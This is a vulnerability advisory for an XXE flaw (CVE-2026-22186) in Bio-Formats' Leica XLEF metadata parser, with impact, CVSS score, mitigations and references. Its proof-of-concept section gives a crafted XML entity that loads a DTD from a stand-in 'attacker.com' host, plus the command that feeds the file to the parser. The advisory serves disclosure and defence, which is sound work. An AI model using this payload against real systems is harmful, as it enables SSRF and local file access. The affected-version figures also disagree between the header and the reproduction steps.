# Bio-Formats XXE in Leica Metadata Parser (CVE-2026-22186)

**Author:** Beatriz Fresno Naumova, Ron Edgerson

**Date:** 18/03/2026 (Github Advisory)

**Vendor:** Open Microscopy Environment

**Product:** Bio-Formats

**Version Affected:** ≤ 8.4.0

**Fixed Version:** 8.5.0

**Component:** Leica metadata parser (XLEF)

**CWE:** CWE-611 – Improper Restriction of XML External Entity Reference

**Attack Vector:** Local

### Description

Bio-Formats versions up to and including 8.4.0 contain an **XML External Entity (XXE)** vulnerability in the Leica metadata parsing component (XLEF).

The parser uses an insecure configuration of `DocumentBuilderFactory`, allowing external entity expansion and loading of external DTDs. As a result, a specially crafted XML metadata file can trigger unintended behavior during parsing.

### Impact

Successful exploitation may allow:

* Server-Side Request Forgery (**SSRF**) via outbound network requests
* Access to local system resources (if readable)
* Denial of Service (**DoS**) during XML parsing

### CVSS Details

**CVSS v3.1 Vector:**\
`CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H`

**Base Score:** 7.1 (**High**)

### Proof of Concept (PoC)

#### Steps to Reproduce

1. Install a vulnerable version of Bio-Formats (≤ 8.3.0).
2. Prepare a malicious XLEF/XML file containing an external entity:

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<root>&xxe;</root>
```

3. Execute the Bio-Formats analysis tool with the crafted file:

```bash
java -cp bioformats_package.jar \
     loci.formats.tools.ImageInfo xxe_blind.xlef
```

4. Observe outbound network requests or unintended resource access triggered during XML parsing.

### Mitigation

* Disable external entity processing in XML parsers
* Configure DocumentBuilderFactory securely:
  * Enable `FEATURE_SECURE_PROCESSING`
  * Disable DTDs and external entities
* Validate and sanitize XML inputs before processing
* Update to a patched version when available

### Discoverer

* Beatriz Fresno Naumova
* Ron Edgerson

### References

* **NVD:** <https://nvd.nist.gov/vuln/detail/CVE-2026-22186>
* **VulnCheck Advisory:** <https://www.vulncheck.com/advisories/bio-formats-xxe-in-leica-xlef-metadata-parser>
* **Bio-Formats (Github Advisory):** <https://github.com/ome/bioformats/security/advisories/GHSA-x9vc-qh97-8gjp>
